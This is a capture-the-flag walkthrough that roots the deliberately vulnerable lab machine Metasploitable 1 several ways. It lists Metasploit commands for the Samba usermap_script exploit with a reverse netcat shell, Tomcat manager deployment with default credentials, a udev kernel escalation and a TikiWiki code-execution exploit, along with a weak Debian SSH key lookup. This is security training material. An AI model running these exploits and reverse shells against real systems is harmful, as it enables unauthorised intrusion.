Metasploitable: 1 – walkthrough
Metasploitable: 1 surfaced on VulnHub on May 19th, 2010. Created by Metasploit, it can be found at https://www.vulnhub.com/entry/metasploitable-1,28/. It is the first machine in the Metasploitable series. The objective is to get root privileges.
For the attacking machine, I will be using Kali 2017.1.
Once booted, this is what the victim machine will look like:
We start the attack by finding the IP of the victim machine by using the netdiscover command:
Now that we know our target IP, let’s start by scanning the ports and try to get more information about it:
The scan shows us that the following ports are open:
- Port 21 – Running FTP
- Port 22 – Running OpenSSH
- Port 23 – Running Telnet
- Port 25 – Running SMTP
- Port 80 – Running Apache Web server
- Port 139 – Running Samba
- Port 445 – Running Samba
- Port 3306 – Running MySQL
- Port 5432 – Running PostgreSQL
- Port 8009 – Running Apache Jserv
- Port 8180 – Running Apache Tomcat
Upon visiting the web application (on port 80 via http://) we just see a default Test Page:
Looking at the source code does not reveal us anything either.
Looking back at the scan results, one particular port catches my eye, Port 445 running Samba 3.0.20. Doing some basic research, I found a vulnerability (CVE 2007-2447): http://www.cvedetails.com/cve/cve-2007-2447. Let’s fire up Metasploit and see if that works:
$ use exploit/multi/samba/usermap_script
$ set PAYLOAD cmd/unix/reverse_netcat
And we are root!
Since this took no time at all, I decided to see how many more ways I could find to exploit this machine.
The next thing that caught my eye while looking back at the scan was port 8180 running Tomcat. Check that on the browser, this is what I found:
While doing some light reading, I came across the following link, https://www.rapid7.com/db/modules/exploit/multi/http/tomcat_mgr_deploy, and though of giving it a try:
$ use exploit/multi/http/tomcat_mgr_deploy
$ use payload/java/meterpreter/reverse_tcp
$ set httpusername tomcat
$ set httppassword tomcat
$ set target 0
$ set RPORT 8180
We did get a low privilege shell. Let’s see how we can escalate our privilege!
While looking around, I saw that the kernel is vulnerable to the following exploit: https://www.rapid7.com/db/modules/exploit/linux/local/udev_netlink
Let’s give it a shot:
$ use exploit/linux/local/udev_netlink
And we get root!
Note: Since the default credentials are tomcat: tomcat, you can log in at http://172.16.92.139:8180/admin and play around a bit as well.
Next, I thought of playing around with PostgreSQL. I tried to run a scan, and it came up with a username and password:
$ use auxiliary/scanner/postgres/postgres_login
Moving on, I wanted to do something with the web app. So, I bring my old friend, dirbuster out to real the secrets:
TWiki looks interesting. Going to the browser it shows:
Let’s see if Metasploit has anything on it:
Let’s start with this:
We are getting somewhere. Now let’s try a remote PHP code execution exploit we saw earlier:
$ use exploit/unix/webapp/tikiwiki_graph_formula_exec
We do get a limited shell. However, it took a few attempts before the shell was spawned.
Checking its root directory shows us:
Let’s see what ssh has:
Let’s ssh with these credentials:
Note: You’ll need to download the following keys in order to search: https://hdm.io/tools/debian-openssl/ (2048 bit RSA)
In the folder, let’s search for a key:
$ grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEApmGJFZNl0ibMNALQx7M6sGGoi4KNmj6PVxpbpG70lShHQqldJkcteZZdPFSbW76IUiPR0Oh+WBV0x1c6iPL/0zUYFHyFKAz1e6/5teoweG1jr2qOffdomVhvXXvSjGaSFwwOYB8R0QxsOWWTQTYSeBa66X6e777GVkHCDLYgZSo8wWr5JXln/Tw7XotowHr8FEGvw2zW1krU3Zo9Bzp0e0ac2U+qUGIzIu/WwgztLZs5/D9IyhtRWocyQPE+kcP+Jz2mt4y1uA73KqoXfdw5oGUkxdFo9f1nu2OwkjOc+Wv8Vw7bwkf+1RgiOMgiJ5cCs4WocyVxsXovcNnbALTp3w
And now, time to get in!!
$ ssh -i 57c3115d77c56390332dc5c49978627a-5429 email@example.com
And we are root!